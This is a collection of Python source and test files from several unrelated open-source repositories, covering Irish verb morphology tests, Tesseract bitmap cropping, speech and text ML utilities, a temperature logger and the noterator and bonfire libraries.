si = SingularInfoA("canúint", Gender.Fem)
assert si.genitive[0].value == 'canúna'
def test_singular_info_d():
si = SingularInfoD("cara", Gender.Masc)
assert si.genitive[0].value == 'carad'
si = SingularInfoD("fiche", Gender.Masc)
assert si.genitive[0].value == 'fichead'
def test_singular_info_ax():
si = SingularInfoAX("cathair", Gender.Fem, syncopation=True)
assert si.genitive[0].value == 'cathrach'
```
#### File: pygramadan/tests/test_verb.py
```python
from pygramadan.attributes import Mutation, VPPerson, VPPolarity, VPShape
from pygramadan.attributes import VPTense, VerbDependency, VerbMood
from pygramadan.attributes import VerbPerson, VerbTense
from pygramadan.verb import init_moods, init_tenses, Verb, get_example
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
AIMSIGH_XML_FULL = get_example()
AIMSIGH_XML_BASIC = """
<verb default="aimsigh" disambig="">
<verbalNoun default="aimsiú" />
<verbalAdjective default="aimsithe" />
<tenseForm default="aimsigh" tense="Past" dependency="Indep" person="Base" />
<tenseForm default="aimsíomar" tense="Past" dependency="Indep" person="Pl1" />
<tenseForm default="aimsíodar" tense="Past" dependency="Indep" person="Pl3" />
<moodForm default="aimsíodh" mood="Imper" person="Base" />
<moodForm default="aimsím" mood="Imper" person="Sg1" />
<moodForm default="aimsigh" mood="Imper" person="Sg2" />
</verb>
"""
def test_read_xml():
sio = io.StringIO(AIMSIGH_XML_BASIC)
aimsigh = Verb(source=sio)
assert aimsigh.moods[VerbMood.Imper][VerbPerson.Sg2][0].value == 'aimsigh'
assert aimsigh.get_lemma() == 'aimsigh'
def make_aimsigh_basic():
tenses = init_tenses()
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Base].append(Form('aimsigh'))
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Pl1].append(Form('aimsíomar'))
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Pl3].append(Form('aimsíodar'))
moods = init_moods()
moods[VerbMood.Imper][VerbPerson.Base].append(Form('aimsíodh'))
moods[VerbMood.Imper][VerbPerson.Sg1].append(Form('aimsím'))
moods[VerbMood.Imper][VerbPerson.Sg2].append(Form('aimsigh'))
return Verb(verbal_noun=[Form('aimsiú')],
verbal_adj=[Form('aimsithe')],
tenses=tenses,
moods=moods)
def test_to_xml():
aimsigh = make_aimsigh_basic()
xml = aimsigh.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(AIMSIGH_XML_BASIC, xml, PARSE_XML) is True
def test_get_identifier():
aimsigh = make_aimsigh_basic()
assert aimsigh.get_identifier() == 'aimsigh_verb'
def test_default_tense_rule():
aimsigh = make_aimsigh_basic()
rules = aimsigh.get_tense_rules(VPTense.Past, VPPerson.Sg1, VPShape.Interrog, VPPolarity.Pos)
assert len(rules) == 1
assert rules[0].particle == 'ar'
assert rules[0].mutation == Mutation.Len1
_ABAIR_XML_FRAG = """
<verb default="abair" disambig="">
<verbalNoun default="rá" />
<verbalAdjective default="ráite" />
<tenseForm default="dúramar" tense="Past" dependency="Indep" person="Pl1" />
<moodForm default="abair" mood="Imper" person="Sg2" />
</verb>
"""
def test_default_rule_changes():
sio = io.StringIO(_ABAIR_XML_FRAG)
abair = Verb(source=sio)
rules = abair.get_tense_rules(VPTense.Past, VPPerson.Sg1, VPShape.Interrog, VPPolarity.Pos)
# it's a silly thing, but the matching is based on lemma, so if this fails, so does the rest
assert abair.get_lemma() == 'abair'
assert len(rules) == 1
# 'ar'/Len1 by default: see test_default_tense_rule()
assert rules[0].particle == 'an'
assert rules[0].mutation == Mutation.Ecl1x
def test_get_all_forms():
exp = [('cond_indep_auto', 'aimseofaí'), ('prescont_indep_sg1', 'aimsím'),
('pastcont_dep_sg2', 'aimsíteá'), ('fut_indep_pl1', 'aimseoimid'),
('prescont_dep_base', 'aimsíonn'), ('cond_dep_pl3', 'aimseoidís'),
('imper_pl2', 'aimsígí'), ('verbal_adj', 'aimsithe'),
('pastcont_dep_pl1', 'aimsímis'), ('pastcont_indep_auto', 'aimsítí'),
('verbal_noun', 'aimsiú'), ('past_indep_base', 'aimsigh'),
('past_dep_pl3', 'aimsíodar'), ('pastcont_indep_pl3', 'aimsídís'),
('past_indep_auto', 'aimsíodh'), ('fut_dep_pl1', 'aimseoimid'),
('cond_indep_pl3', 'aimseoidís'), ('fut_dep_auto', 'aimseofar'),
('prescont_indep_base', 'aimsíonn'), ('fut_indep_base', 'aimseoidh'),
('cond_indep_sg1', 'aimseoinn'), ('cond_dep_sg2', 'aimseofá'),
('imper_pl3', 'aimsídís'), ('subj_auto', 'aimsítear'),
('pastcont_indep_base', 'aimsíodh'), ('past_dep_auto', 'aimsíodh'),
('prescont_indep_auto', 'aimsítear'), ('prescont_indep_pl1', 'aimsímid'),
('pastcont_indep_pl1', 'aimsímis'), ('subj_pl1', 'aimsímid'),
('past_dep_base', 'aimsigh'), ('cond_dep_base', 'aimseodh'),
('past_dep_pl1', 'aimsíomar'), ('pastcont_dep_sg1', 'aimsínn'),
('subj_base', 'aimsí'), ('prescont_dep_sg1', 'aimsím'),
('cond_indep_base', 'aimseodh'), ('cond_dep_sg1', 'aimseoinn'),
('imper_sg1', 'aimsím'), ('imper_auto', 'aimsítear'),
('pastcont_indep_sg1', 'aimsínn'), ('cond_indep_sg2', 'aimseofá'),
('pastcont_indep_sg2', 'aimsíteá'), ('past_indep_pl3', 'aimsíodar'),
('fut_indep_auto', 'aimseofar'), ('fut_dep_base', 'aimseoidh'),
('pastcont_dep_base', 'aimsíodh'), ('past_indep_pl1', 'aimsíomar'),
('imper_pl1', 'aimsímis'), ('pastcont_dep_pl3', 'aimsídís'),
('cond_dep_pl1', 'aimseoimis'), ('cond_indep_pl1', 'aimseoimis'),
('imper_base', 'aimsíodh'), ('imper_sg2', 'aimsigh'),
('prescont_dep_pl1', 'aimsímid'), ('cond_dep_auto', 'aimseofaí'),
('pastcont_dep_auto', 'aimsítí'), ('prescont_dep_auto', 'aimsítear')]
sio = io.StringIO(AIMSIGH_XML_FULL)
aimsigh = Verb(source=sio)
aimsigh_list = aimsigh.get_all_forms()
aimsigh_list.sort()
exp.sort()
assert aimsigh_list == exp
def test_get_unique_forms():
exp = ['aimsítear', 'aimseoidh', 'aimsíteá', 'aimsigh', 'aimsí',
'aimsíodar', 'aimsímis', 'aimseoimid', 'aimsímid', 'aimseofar',
'aimseoinn', 'aimsítí', 'aimsíodh', 'aimseoidís', 'aimseodh',
'aimsíomar', 'aimsithe', 'aimseofá', 'aimsídís', 'aimsím',
'aimsíonn', 'aimseofaí', 'aimsiú', 'aimseoimis', 'aimsígí',
'aimsínn']
sio = io.StringIO(AIMSIGH_XML_FULL)
aimsigh = Verb(source=sio)
aimsigh_list = aimsigh.get_unique_forms()
aimsigh_list.sort()
exp.sort()
assert aimsigh_list == exp
``` |
{
"source": "jimregan/tesseract-gle-uncial",
"score": 3
} |
#### File: scripts/python/makeBitmaps.py
```python
import string,time
import codecs
from os import curdir, sep, mkdir, makedirs, path
from subprocess import Popen, PIPE, STDOUT
import lib # my local test lib.py
def main():
print("Hello!")
inputFileName = 'aibitir.box' #'semicolon.box' #'gle-test2.testfont.box'
inputWidth = 1200 #2985 #924
inputHeight = 1800 #4269 #1600
if not path.exists("bitmaps"):
mkdir("bitmaps")
#READ A .BOX FILE
f = codecs.open(inputFileName, 'r', "utf-8-sig")
if not f:
print("Input file " + inputFileName + " not found!")
exit(1)
g = codecs.open("bitmaps/charinfo.utf8", 'w', "utf-8-sig")
if not g:
print("Unable to open output file bitmaps/charinfo.utf8")
exit(1)
linecount = 0
while True:
line = f.readline()
if not line: break
linecount = linecount + 1
#print(line)
c,x1,y1,x2,y2,pageNum = line.split()
#print("x1="+x1+" y1="+y1+" x2="+x2+" y2="+y2)
width = int(x2) - int(x1)
height = int(y2) - int(y1)
xoff = int(x1) - 1 # -1 is weird, does it work for all? TODO check
yoff = inputHeight - 1 - int(y2)
#print("width="+str(width)+" height="+str(height))
outname = "bitmaps" +"/"+lib.lettername(c)+".tif"
#print("outname="+outname)
#cmdline = "convert gle-test2.testfont.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
#cmdline = "convert semicolon.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
cmdline = "convert aibitir.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
print("cmdline=["+cmdline+"]")
p1 = Popen(cmdline, shell=True, stdout=PIPE, stderr=STDOUT)
output = p1.communicate()[0].decode()
if p1.returncode != 0:
print("returncode="+str(p1.returncode))
print(output)
g.write(c + " " + str(width) + " " + str(height) + " " + "0" + "\n") # 0 is just a default y-offset
f.close
g.close
print("linecount = " + str(linecount))
if __name__ == '__main__':
main()
``` |
{
"source": "jimregan/tmh",
"score": 3
} |
#### File: tests/test_speech/test_tts.py
```python
from tmh.speech.tacotron import Tacotron2
import unittest
import os
class TestFlows(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.text_sentences = [{
"text": "Room 509 is full of awesome people!",
"filename": "509.wav"
}]
cls.tacotron2 = Tacotron2()
def test_tacotron2(self):
"""
Test tacotron 2 speech synthesis.
"""
for text in self.text_sentences:
self.tacotron2.synthesize(text["text"], text["filename"])
self.assertTrue(os.path.exists(
os.path.join(os.getcwd(), text["filename"])))
os.remove(os.path.join(os.getcwd(), text["filename"]))
```
#### File: tmh/tmh/get_image.py
```python
import requests
import json
import random
def get_random_integer(number):
"""
This function takes in a number and returns a random integer between 0 and that number
"""
return random.randint(0, number)
def get_meme(keyword):
"""
This function takes in a keyword and returns a url of a meme
"""
url = "http://api.giphy.com/v1/gifs/search?q=" + keyword + "&api_key=dc6zaTOxFJmzC&limit=10"
response = requests.get(url)
data = json.loads(response.text)
return data['data'][get_random_integer(10)]['images']['original']['url']
meme = get_meme("turtles")
print(meme)
```
#### File: tmh/tmh/overlap.py
```python
from pyannote.audio.pipelines import OverlappedSpeechDetection
HYPER_PARAMETERS = {
# onset/offset activation thresholds
"onset": 0.5, "offset": 0.5,
# remove speech regions shorter than that many seconds.
"min_duration_on": 0.0,
# fill non-speech regions shorter than that many seconds.
"min_duration_off": 0.0
}
pipeline = OverlappedSpeechDetection(segmentation="pyannote/segmentation")
def overlap_detection(audio_path):
pipeline.instantiate(HYPER_PARAMETERS)
overlap = pipeline(audio_path)
# print("extracting overlap")
print(overlap)
return(overlap.for_json())
# file_path = "./test.wav"
# output = transcribe_from_audio_path_split_on_speech(file_path, "English")
# print(output)y7h
```
#### File: tmh/speech/tacotron.py
```python
import torch
import torch.nn as nn
import torchaudio
# from BaseSpeechModel import BaseSpeechModel
from .base_speech_model import BaseSpeechModel
device = 'cuda' if torch.cuda.is_available() else 'cpu'
class Tacotron2(BaseSpeechModel):
def __init__(self):
super(Tacotron2, self).__init__()
self.model = self.load_model()
self.vocoder = self.load_vocoder()
self.text_normalizer = self.get_text_utils()
self.sample_rate = 22050
def load_model(self):
r"""
Loads tacotron 2
"""
tacotron2 = torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_tacotron2', model_math='fp16')
tacotron2 = tacotron2.to(device)
tacotron2.eval()
return tacotron2
def load_vocoder(self):
r"""
Loads waveglow
"""
waveglow = torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_waveglow', model_math='fp16')
waveglow = waveglow.remove_weightnorm(waveglow)
waveglow = waveglow.to(device)
waveglow.eval()
return waveglow
def get_text_utils(self):
r"""
Download text preprocessing utils
"""
return torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_tts_utils')
def write_to_file(self, filename, data):
r"""
Write numpy array of audio content to file
Args:
filename (str): final output filename
data (torch.tensor): audio data
"""
data = self.push_to_cpu(data)
torchaudio.save(filename, data, self.sample_rate)
def synthesize(self, text, filename):
r"""
Main function to use for text synthesise
Args:
text (str): text to convert to audio
filename (str): final output filename
Usage:
```
>>> from tmh.speech.tacotron import Tacotron2
>>> tacotron = Tacotron2()
>>> text = "Hello"
>>> filename = "test.wav"
>>> tacotron.synthesize(text, filename)
```
"""
sequences, lengths = self.text_normalizer.prepare_input_sequence([
text])
with torch.no_grad():
mel, _, _ = self.model.infer(sequences, lengths)
audio = self.vocoder.infer(mel)
self.write_to_file(filename, audio)
```
#### File: tmh/text/ner.py
```python
from transformers import pipeline
models = {
'kb-ner': 'KB/bert-base-swedish-cased-ner',
"swedish-wikiann": "birgermoell/ner-swedish-wikiann"
}
def named_entity_recognition(text, model='KB/bert-base-swedish-cased-ner', tokenizer='KB/bert-base-swedish-cased-ner'):
"""
Named entity recognition
"""
# Load the model
ner = pipeline('ner', model=model, tokenizer=tokenizer)
# Get the result
result = ner(text)
# Return the resultß
return result
# ner = named_entity_recognition('KTH är ett universitet i Stockholm')
# print(ner)
```
#### File: tmh/text/translate.py
```python
from transformers import AutoTokenizer, AutoModelWithLMHead, AutoModelForSeq2SeqLM, TranslationPipeline, pipelines
def translate_text(text, model="SEBIS/legal_t5_small_trans_sv_en_small_finetuned", tokenizer="SEBIS/legal_t5_small_trans_sv_en_small_finetuned"):
pipeline = TranslationPipeline(
model=AutoModelWithLMHead.from_pretrained(model),
tokenizer=AutoTokenizer.from_pretrained(pretrained_model_name_or_path = tokenizer, do_lower_case=False,
skip_special_tokens=True))
translation = pipeline(text, max_length=512)
return translation
def translate_between_languages(text, model):
tokenizer = AutoTokenizer.from_pretrained(model)
model = AutoModelForSeq2SeqLM.from_pretrained(model)
translated = model.generate(**tokenizer(text, return_tensors="pt", padding=True))
output = [tokenizer.decode(t, skip_special_tokens=True) for t in translated]
# print(output)
return output[0]
# sv_text = "<NAME> var son till Hermann och <NAME>, vilka var icke-religiösa judar och tillhörde medelklassen. Fadern var försäljare och drev senare en elektroteknisk fabrik. Familjen bosatte sig 1880 i München där Einstein gick i en katolsk skola. Mängder av myter cirkulerar om <NAME>ins person. En av dessa är att han som barn skulle ha haft svårigheter med matematik, vilket dock motsägs av hans utmärkta betyg i ämnet.[15] Han nämnde ofta senare att han inte trivdes i skolan på grund av dess pedagogik. Att <NAME> skulle vara släkt med musikvetaren <NAME> är ett, ofta framfört, obevisat påstående. A<NAME> dotter Eva har framhållit att något sådant släktskap inte existerar."
# translation = translate_text(sv_text)
# print(translation)
```
#### File: web/backend/server.py
```python
from re import template
from typing import Optional
from fastapi import FastAPI
from pydantic import BaseModel
from starlette.middleware.cors import CORSMiddleware
from fastapi.staticfiles import StaticFiles
from tmh.text.text_generation import generate_text
import uvicorn
class TextRequest(BaseModel):
text: str
class Config:
schema_extra = {
"example": {
"text": "KTH är ett universitet i Stockholm",
}
}
class SummaryRequest(BaseModel):
text: str
class Config:
schema_extra = {
"example": {
"text": "<NAME> var son till Hermann och <NAME>, vilka var icke-religiösa judar och tillhörde medelklassen. Fadern var försäljare och drev senare en elektroteknisk fabrik. Familjen bosatte sig 1880 i München där Einstein gick i en katolsk skola. Mängder av myter cirkulerar om <NAME> person. En av dessa är att han som barn skulle ha haft svårigheter med matematik, vilket dock motsägs av hans utmärkta betyg i ämnet.[15] Han nämnde ofta senare att han inte trivdes i skolan på grund av dess pedagogik. Att <NAME> skulle vara släkt med musikvetaren <NAME> är ett, ofta framfört, obevisat påstående. <NAME> dotter Eva har framhållit att något sådant släktskap inte existerar."
}
}
class ZeroShotRequest(BaseModel):
sequence: str
labels: list
class Config:
schema_extra = {
"example": {
"sequence": "one day I will see the world",
"labels": ['travel', 'cooking', 'dancing']
}
}
class GenerateRequest(BaseModel):
text: str
model: Optional[str] = None
max_length: Optional[int] = None
temperature: Optional[float] = None
class Config:
schema_extra = {
"example": {
"text": "Det var en gång",
"model": "birgermoell/swedish-gpt",
"max_length": 250,
"temperature": 0.9
}
}
class QaRequest(BaseModel):
question: str
context: str
class Config:
schema_extra = {
"example": {
"question": "What is the meaning of life?",
"context": "The meaning of life is to be happy",
}
}
class PhonemeRequest(BaseModel):
text: str
language: str
model: Optional[str] = None
class Config:
schema_extra = {
"example": {
"text": "Tal, <NAME> är en underbar plats.",
"language": "Swedish",
}
}
app = FastAPI()
origins = [
"http://localhost.tiangolo.com",
"https://localhost.tiangolo.com",
"http://localhost",
"http://localhost:3000",
"http://localhost:3001",
"http://localhost:3002",
"http://localhost:3003",
"http://localhost:3000",
"http://localhost:8080",
"http://127.0.0.1:8000/"
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
app.mount("/models", StaticFiles(directory="models"), name="models")
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.post("/generate")
async def generate_response(generateRequest: GenerateRequest):
print("inside with reequest")
print(generateRequest)
if generateRequest.model:
response = generate_text(
model=generateRequest.model,
prompt=generateRequest.text,
max_length=generateRequest.max_length,
temperature=generateRequest.temperature,
)
else:
response = generate_text(model='birgermoell/swedish-gpt', prompt=generateRequest.text, max_length=250, temperature=0.9)
print("response is", response)
#print("the response is", response)
return {
"text": response }
@app.post("/ner")
async def qa_response(textRequest: TextRequest):
from tmh.text.ner import named_entity_recognition
ner = named_entity_recognition(textRequest.text)
print(ner)
ner = ner
cleaned = []
for item in ner:
item['score'] = float(item['score'])
item['start'] = int(item['start'])
item['end'] = int(item['end'])
cleaned.append(item)
return {
"ner": cleaned
}
@app.post("/qa")
async def qa_response(qaRequest: QaRequest):
from tmh.text.question_answering import get_answer
answer = get_answer({'question': qaRequest.question, 'context': qaRequest.context})
print("the answer response is", answer)
return answer
@app.post("/zero_shot")
async def qa_response(zeroShotRequest: ZeroShotRequest):
from tmh.text.zero_shot import get_zero_shot_classification
classified_label = get_zero_shot_classification(zeroShotRequest.sequence, zeroShotRequest.labels)
print("the classified label response is", classified_label)
return classified_label
@app.post("/translate_and_summarize")
async def qa_response(summaryRequest: SummaryRequest):
from tmh.text.summarization import translate_and_summarize
swedish_summary = translate_and_summarize(summaryRequest.text)
print(swedish_summary)
return swedish_summary
@app.post("/phonemize")
async def qa_response(phonemeRequest: PhonemeRequest):
print("inside phonemize with", phonemeRequest)
from tmh.phonemes import get_phonemes
# import pdb
# pdb.set_trace()
phoneme_models = {
"English": "models/en_us_cmudict_ipa_forward.pt",
"Swedish": "models/best_model_no_optim.pt"
}
phonemes = get_phonemes(phonemeRequest.text, phoneme_models[phonemeRequest.language], language=phonemeRequest.language)
print(phonemes)
return phonemes
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=4000)
``` |
{
"source": "jimrkh/temperature-logger",
"score": 3
} |
#### File: jimrkh/temperature-logger/temperature-logger.py
```python
import time
from datetime import datetime
import schedule
from influxdb import InfluxDBClient
from w1thermsensor import W1ThermSensor
from config import (
SCHEDULE_TIME_DELTA,
INFLUXDB_HOST, INFLUXDB_PORT, INFLUXDB_DB, INFLUXDB_NAME, INFLUXDB_PASSWD,
SENSOR_LOCATIONS_NA, SENSOR_LOCATIONS
)
def job():
measurement_list = []
for sensor in W1ThermSensor.get_available_sensors():
measurement_value = sensor.get_temperature(W1ThermSensor.DEGREES_C)
measurement_time = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
measurement = {
"measurement": "temperature_sensor",
"tags": {
"id": sensor.id,
# "prefix": sensor.slave_prefix,
# "path": sensor.sensorpath,
"device_name": sensor.type_name,
"device_type": sensor.type,
"location": SENSOR_LOCATIONS.get(sensor.id,SENSOR_LOCATIONS_NA),
"unit": "C",
},
"time": measurement_time,
"fields": {
"value": measurement_value,
},
}
print("Sensor %s has temperature %.2f at %s" % (sensor.id, measurement_value, measurement_time))
measurement_list.append(measurement)
db_client = InfluxDBClient(INFLUXDB_HOST, INFLUXDB_PORT, INFLUXDB_NAME, INFLUXDB_PASSWD, INFLUXDB_DB)
db_client.write_points(measurement_list)
def main():
schedule.every(SCHEDULE_TIME_DELTA).seconds.do(job)
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
main()
``` |
{
"source": "jimr/noterator",
"score": 3
} |
#### File: noterator/noterator/config.py
```python
import os
try:
from ConfigParser import SafeConfigParser as ConfigParser
except ImportError: # py3k
from configparser import ConfigParser
class ConfigurationError(Exception):
pass
def load_config(fname=None):
"""Load and return configuration from a file.
Args:
fname (str): Path to the ini file we should use. If not provided, we
default to $HOME/.config/noterator/config.ini
Returns:
The parsed configuration
Raises:
ConfigurationError: if the file can't be found.
"""
if not fname:
fname = os.path.join(
os.getenv('HOME', ''), '.config', 'noterator', 'config.ini'
)
if not os.path.exists(fname):
raise IOError(
"Unable to find configuration file."
)
config = ConfigParser()
config.read(fname)
return config
```
#### File: noterator/plugins/twilio.py
```python
from __future__ import absolute_import
import requests
REQUIRED_CONFIG = [
'account_sid', 'token', 'from_number', 'to_number',
]
BASE_URL = 'https://api.twilio.com/2010-04-01'
def notify(head, body, **kwargs):
account_sid = kwargs['account_sid']
token = kwargs['token']
from_number = kwargs['from_number']
to_number = kwargs['to_number']
url = '{}/Accounts/{}/Messages.json'.format(BASE_URL, account_sid)
payload = {
"From": from_number,
"To": to_number,
"Body": "{}: {}".format(head, body),
}
auth = (account_sid, token)
requests.post(url, payload, auth=auth)
```
#### File: noterator/tests/test_email_plugin.py
```python
import mock
import unittest
from email.mime.text import MIMEText
from freezegun import freeze_time
from noterator import Noterator, EMAIL
class TestEmailPlugin(unittest.TestCase):
@freeze_time("2016-10-01 09:20:00")
@mock.patch('noterator.plugins.email.smtplib')
def test_email_settings(self, smtplib):
cfg = {
'recipient': '<EMAIL>',
'from_mail': '<EMAIL>',
'host': 'smtp.example.com',
'port': '250', # not 25 because that's the default value
'username': 'smtpuser',
'password': '<PASSWORD>',
}
smtp = mock.Mock()
smtplib.SMTP = mock.Mock(return_value=smtp)
n = Noterator(range(5), EMAIL, config_file=None)
n.configure_plugin('email', **cfg)
for _ in n:
pass
msg = MIMEText(n._get_body(EMAIL, finished=True))
msg['Subject'] = n.head
msg['From'] = cfg['from_mail']
msg['To'] = cfg['recipient']
smtplib.SMTP.assert_called_once_with(cfg['host'], cfg['port'])
smtp.sendmail.assert_called_once_with(
cfg['from_mail'], [cfg['recipient']], msg.as_string(),
)
```
#### File: noterator/tests/test_utils.py
```python
import unittest
from noterator.utils import catch_all
class TestUtils(unittest.TestCase):
def test_catch_all(self):
@catch_all
def exceptional_function():
raise Exception("No-one should notice this")
try:
exceptional_function()
except Exception:
self.fail("Exception not caught")
```
#### File: noterator/tests/utils.py
```python
import os
from noterator import Noterator
def get_config_path(fname):
return os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
fname,
)
def all_available_methods():
# Take a list of, e.g [EMAIL, HIPCHAT, TWILIO] and turn it into
# EMAIL|HIPCHAT|TWILIO
available_methods = [method for (method, _, _) in Noterator.methods]
method = available_methods.pop(0)
while len(available_methods):
method |= available_methods.pop(0)
return method
``` |
{
"source": "jimrobinson/bonfire",
"score": 2
} |
#### File: bonfire/bonfire/graylog_api.py
```python
import requests
import arrow
import syslog
from .dateutils import datetime_converter
class Message(object):
def __init__(self, message_dict={}):
self.message_dict = dict(message_dict["message"])
self.timestamp = arrow.get(self.message_dict.get("timestamp", None))
self.level = self.message_dict.get("level", syslog.LOG_INFO)
self.message = self.message_dict.get("message", "")
def simple_formatted(self):
return "[{}] {}: {}".format(self.timestamp, self.level, self.message)
class SearchResult(object):
def __init__(self, result_dict={}):
self.query = result_dict.get("query", None)
self.query_object = None
self.used_indices = result_dict.get("used_indices", None)
self.queried_range = result_dict.get("queried_range", None)
self.range_from = arrow.get(result_dict.get("from", None))
self.range_to = arrow.get(result_dict.get("to", None))
self.range_duration = result_dict.get("time", None)
self.fields = result_dict.get("fields", [])
self.total_results = result_dict.get("total_results", None)
self.messages = list(map(Message, result_dict.get("messages", [])))
def simple_formatted(self):
return "\n".join(map(lambda m: m.simple_formatted(), self.messages))
class SearchRange(object):
def __init__(self, from_time=None, to_time=None, relative=False):
self.from_time = datetime_converter(from_time)
self.to_time = datetime_converter(to_time)
self.relative = relative
def is_relative(self):
return self.relative
def range_in_seconds(self):
if self.is_relative():
range = arrow.now('local').timestamp - self.from_time.timestamp
else:
range = (self.to_time - self.from_time).seconds
if range < 1:
return 1
return range
class SearchQuery(object):
def __init__(self, search_range, query="*", limit=None, offset=None, filter=None, fields=None, sort=None,
ascending=False):
self.search_range = search_range
self.query = query
self.limit = limit
self.offset = offset
self.filter = filter
self.fields = fields
self.sort = sort
self.ascending = ascending
def copy_with_range(self, search_range):
q = SearchQuery(search_range, self.query, self.limit, self.offset, self.filter, self.fields, self.sort,
self.ascending)
return q
class GraylogAPI(object):
def __init__(self, host, port, endpoint, username, password=<PASSWORD>, host_tz='utc', default_stream=None, scheme='http',
proxies=None):
endpoint = '/' + endpoint.strip('/')
self.host = host
self.port = port
self.endpoint = endpoint
self.username = username
self.password = password
self.host_tz = host_tz
self.default_stream = default_stream
self.proxies = proxies
self.get_header = {"Accept": "application/json"}
self.base_url = "{scheme}://{host}:{port}{endpoint}".format(host=host, port=port, scheme=scheme,
endpoint=endpoint)
if self.base_url[-1] != '/':
self.base_url += '/'
def __str__(self):
name = "{host}:{port}".format(host=self.host, port=self.port)
if self.endpoint != '/':
name += self.endpoint
return name
def get(self, url, **kwargs):
params = {}
for label, item in kwargs.items():
if isinstance(item, list):
params[label + "[]"] = item
else:
params[label] = item
r = requests.get(self.base_url + url, params=params, headers=self.get_header,
auth=(self.username, self.password), proxies=self.proxies)
if r.status_code == requests.codes.ok:
return r.json()
else:
r.raise_for_status()
def search(self, query, fetch_all=False):
sort = None
if query.sort is not None:
if query.ascending:
sort = query.sort + ":asc"
else:
sort = query.sort + ":desc"
if fetch_all and query.limit is None:
result = self.search_raw(query.query, query.search_range, 1, query.offset,
query.filter, query.fields, sort)
sr = SearchRange(from_time=result.range_from, to_time=result.range_to)
if result.total_results > 10000:
raise RuntimeError("Query returns more than 10000 log entries. Use offsets to query in chunks.")
result = self.search_raw(query.query, sr, result.total_results, query.offset,
query.filter, query.fields, sort)
else:
result = self.search_raw(query.query, query.search_range, query.limit, query.offset,
query.filter, query.fields, sort)
result.query_object = query
return result
def user_info(self, username):
url = "users/" + username
return self.get(url=url)
def streams(self):
url = "streams"
return self.get(url=url)
def search_raw(self, query, search_range, limit=None, offset=None, filter=None, fields=None, sort=None):
url = "search/universal/"
range_args = {}
if filter is None and self.default_stream is not None:
filter = "streams:{}".format(self.default_stream)
if search_range.is_relative():
url += "relative"
range_args["range"] = search_range.range_in_seconds()
else:
url += "absolute"
range_args["from"] = search_range.from_time.to(self.host_tz).format("YYYY-MM-DD HH:mm:ss.SSS")
if search_range.to_time is None:
to_time = arrow.now(self.host_tz)
else:
to_time = search_range.to_time.to(self.host_tz)
range_args["to"] = to_time.format("YYYY-MM-DD HH:mm:ss.SSS")
if fields is not None:
fields = ",".join(fields)
result = self.get(
url=url,
query=query,
limit=limit,
offset=offset,
filter=filter,
fields=fields,
sort=sort,
**range_args)
return SearchResult(result)
```
#### File: bonfire/bonfire/_version.py
```python
import inspect
import os
import re
import subprocess
import sys
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
# these strings will be replaced by git during git-archive
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
# general settings
tag_prefix = 'v' # tags are like v1.2.0
package = "bonfire"
namespace = []
root_pkg = namespace[0] if namespace else package
if namespace:
pkg_path = os.path.join(*namespace[-1].split('.') + [package])
else:
pkg_path = package
class ShellCommand(object):
def __init__(self, command, shell=True, cwd=None):
self._command = command
self._shell = shell
self._cwd = cwd
def __call__(self, *args):
command = "{cmd} {args}".format(cmd=self._command,
args=subprocess.list2cmdline(args))
output = subprocess.check_output(command,
shell=self._shell,
cwd=self._cwd,
stderr=subprocess.STDOUT,
universal_newlines=True)
return self._yield_output(output)
def _yield_output(self, msg):
for line in msg.splitlines():
yield line
def get_git_cmd(**args):
if sys.platform == "win32":
for cmd in ["git.cmd", "git.exe"]:
git = ShellCommand(cmd, **args)
try:
git("--version")
except (subprocess.CalledProcessError, OSError):
continue
return git
return None
else:
git = ShellCommand("git", **args)
try:
git("--version")
except (subprocess.CalledProcessError, OSError):
return None
return git
def version_from_git(tag_prefix, root, verbose=False):
# this runs 'git' from the root of the source tree. This only gets called
# if the git-archive 'subst' keywords were *not* expanded, and
# _version.py hasn't already been rewritten with a short version string,
# meaning we're inside a checked out source tree.
git = get_git_cmd(cwd=root)
if not git:
print("no git found")
return None
try:
tag = next(git("describe", "--tags", "--dirty", "--always"))
except subprocess.CalledProcessError:
return None
if not tag.startswith(tag_prefix):
if verbose:
print("tag '{}' doesn't start with prefix '{}'".format(tag,
tag_prefix))
return None
tag = tag[len(tag_prefix):]
sha1 = next(git("rev-parse", "HEAD"))
full = sha1.strip()
if tag.endswith("-dirty"):
full += "-dirty"
return {"version": tag, "full": full}
def get_keywords(versionfile_abs):
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = dict()
try:
with open(versionfile_abs, "r") as fh:
for line in fh.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
except EnvironmentError:
return None
return keywords
def version_from_keywords(keywords, tag_prefix, verbose=False):
if not keywords:
return None # keyword-finding function failed to find keywords
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
return None # unexpanded, so not in an unpacked git-archive tarball
refs = set([r.strip() for r in refnames.strip("()").split(",")])
